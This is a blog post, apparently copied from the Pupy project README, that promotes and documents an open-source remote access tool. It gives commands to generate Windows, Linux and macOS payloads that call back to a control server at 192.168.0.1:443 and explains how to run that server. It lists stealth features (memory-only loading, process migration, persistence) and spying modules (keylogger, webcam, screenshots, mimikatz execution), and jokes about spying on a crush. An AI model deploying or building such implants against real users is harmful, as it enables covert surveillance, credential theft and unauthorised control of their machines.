Brisk Infosec - Trusted IT Security Partner : 11/17/15

Tuesday, 17 November 2015

PUPY REMOTE ADMINISTRATION TOOLS

Pupy is an opensource, multi-platform Remote Administration Tool with an embedded Python interpreter. Pupy can load python packages from memory and transparently access remote python objects. Pupy can communicate using different transports and have a bunch of cool features & modules. On Windows, Pupy is a reflective DLL and leaves no traces on disk.

Features :

On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
Pupy can reflectively migrate into other processes
Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
Modules are quite simple to write and pupy is easily extensible.
A lot of awesome modules are already implemented !
Pupy uses rpyc and a module can directly access python objects on the remote client
- We can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
Communication transports are modular and pupy can communicate using obfsproxy pluggable transports
All the non interactive modules can be dispatched on multiple hosts in one command
Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu, osx)
Modules can be executed as background jobs and their output be retrieved later
Commands and scripts running on remote hosts are interruptible
Auto-completion for commands and arguments
Nice colored output :-)
Commands aliases can be defined in the config

Implemented Transports :

tcp_cleartext
- A good example to look at, it's a protocol that does nothing
tcp_base64
- it's more to have a simple example
tcp_ssl (the default one)
obfs3
- A protocol to keep a third party from telling what protocol is in use based on message contents
scramblesuit
- A Polymorphic Network Protocol to Circumvent Censorship

Implemented Modules :

migrate
- inter process architecture injection also works (x86->x64 and x64->x86)
command execution
interactive shell (cmd.exe, /bin/sh, /bin/bash, ...)
- tty allocation is well supported on target running a unix system. Just looks like a ssh shell
interactive python shell
download
upload
persistence
screenshot
webcam snapshot
- ~~to spy on your crush~~
in memory execution of PE exe both x86 and x64 !
- works very well with mimitakz :-)
socks5 proxy
local port forwarding
shellcode exec (thanks to @byt3bl33d3r)
keylogger
- monitor keys, the windows titles the text is typed in and the clipboard ! (thanks @golind for the updates)
mouselogger:
- takes small screenshots around the mouse at each click and send them back to the server (thanks @golind)

How to install

pip install rpyc
pip install pefile

Troubleshooting:

If you have some issues with rpyc while running the server on windows, take a look at issue #25, @deathfantasy made a fix

Generate/run a payload

In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

for Windows

./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

you can also :

use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.
customize the transport used by supplying it with --transport

for Linux

pip install rpyc #(or manually copy it if you are not admin)
python pp.py 192.168.0.1:443

you can also build a single binary with pyinstaller :

pyinstaller --onefile /full_path/pupy/pupy/pp.py

for MAC OS X

easy_install rpyc #(or manually copy it if you are not admin)
python pp.py 192.168.0.1:443

you can also build a single binary with pyinstaller (but you can't "cross-compile", pyinstaller currently only support this from osx):

pyinstaller --onefile /full_path/pupy/pupy/pp.py

start the server

eventually edit pupy.conf to change the bind address / port
start the pupy server with the transport used by the client (tcp_ssl by default):

./pupysh.py --transport <transport_used>

Some screenshots

list connected clients

help

execute python code on all clients

execute a command on all clients, exception is retrieved in case the command does not exists

use a filter to send a module only on selected clients

migrate into another process

interactive shell

interactive python shell

upload and run another PE exe from memory

list available modules (the list is not up to date)

Example: How to write a MsgBox module

first of all write the function/class you want to import on the remote client
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py

import ctypes
import threading

def MessageBox(text, title):
    t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
    t.daemon=True
    t.start()

then, simply create a module to load our package and call the function remotely

class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """

    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")

and that's it, we have a fully functional module :)

>> run msgbox -h
usage: msgbox [-h] [--title TITLE] text

Pop up a custom message box

positional arguments:
  text           text to print in the msgbox :)

  optional arguments:
    -h, --help     show this help message and exit
    --title TITLE  msgbox title